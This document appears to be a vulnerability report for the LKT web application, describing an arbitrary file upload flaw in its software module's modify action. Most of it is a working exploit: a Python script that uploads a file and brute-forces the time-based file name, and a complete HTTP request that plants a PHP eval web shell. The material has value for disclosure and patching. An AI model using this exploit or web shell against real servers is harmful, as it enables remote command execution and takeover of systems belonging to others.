There is an arbitrary file upload getshell vulnerability in the background

[S2eTo]

File Path: LKT/webapp/modules/software/actions/modifyAction.class.php::execute

This method directly splices the unlimited extension in the file name into the file upload target file extension, and can upload the .php file getshell

But the file name is not sent to the page, but time() is used here to get the current time for splicing As long as the blasting is carried out back through the current event, under normal circumstances, the number of blasting will not exceed three times Below is the script I wrote in Python

import time
import socket
import requests

host = "192.168.157.130"
port = 80
client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")
data = file.read()
client.send(data)
client.close()
end = int(time.time())

now = end
coast = end - start


def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()


time.sleep(1)
# coast = coast if coast > 3 else 3
for i in range(0, coast + 1):
    f(now)
    now = now - 1

print("No!!!")

HTTP

POST /LKT/index.php?module=software&action=modify&name=1 HTTP/1.1
Host: 192.168.157.1
Content-Length: 238
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://192.168.157.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: admin_mojavi=2h4889d8ov0i77rrl1q15313t6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy